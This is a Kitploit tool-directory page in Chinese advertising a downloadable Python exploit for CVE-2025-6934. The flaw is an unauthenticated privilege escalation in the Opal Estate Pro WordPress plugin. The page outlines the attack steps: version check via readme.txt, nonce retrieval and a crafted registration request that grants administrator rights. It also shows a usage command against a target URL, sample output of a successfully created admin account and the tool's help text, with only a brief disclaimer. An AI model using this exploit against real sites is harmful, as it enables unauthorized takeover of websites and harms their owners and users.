Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/nxploited/cve-2025-6934
权限提升漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubnxploited/cve-2025-6934

CVE-2025-6934

Opal Estate Pro <= 1.7.5 - 未授权权限提升

查看仓库
9211年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🛡️ CVE-2025-6934 - Opal Estate Pro 中的未认证权限提升

📝 描述

用于 WordPress 的 Opal Estate Pro – 房产管理与提交 插件(被 FullHouse - 房地产响应式 WordPress 主题 使用)在所有版本(包括 1.7.5)中均存在 权限提升 漏洞。


  • CVE 编号: CVE-2025-6934
  • CVSS 评分: 9.8(严重)
  • 发布时间: 2025年6月30日

⚙️ 脚本信息

此 Python 利用脚本通过以下方式自动化权限提升过程:

  • 通过 readme.txt 验证易受攻击的插件版本。
  • 从注册页面获取所需的 nonce。
  • 发送精心构造的注册请求以获取 管理员 访问权限。

🚀 使用示例

root@kitploit:~
python CVE-2025-6934.py -u http://target-site.com/login-default/ -mail [email protected] -password nxp1234

📤 示例输出

root@kitploit:~
[•] Plugin Version Check:
    [+] Vulnerable version detected: 1.7.5

[•] Exploit Attempt Started
    [+] Nonce Found: 70dd70630b
    [+] HTTP Status: 200

[✔] Exploit Successful!
    --------------------------
    Username : nxploitedadmin
    Email    : [email protected]
    Password : nxp1234
    Role     : administrator
    --------------------------

Exploit By: Khaled_alenazi (Nxploited) | https://github.com/Nxploited

🛠️ 参数与帮助

root@kitploit:~
usage: CVE-2025-6934.py [-h] -u URL -mail NEWMAIL -password NEWPASSWORD

CVE-2025-6934 Exploit by Khaled Alenazi (Nxploited)

options:
  -h, --help              show this help message and exit
  -u, --url URL           Target URL (e.g., http://site.com/path/)
  -mail, --newmail NEWMAIL
                          Email to register as admin
  -password, --newpassword NEWPASSWORD
                          Password for new admin user

⚠️ 免责声明

本脚本仅用于教育和授权安全测试目的。
未经同意针对目标未经授权使用此工具是严格禁止的。


By: Khaled_alenazi (Nxploited)

下载工具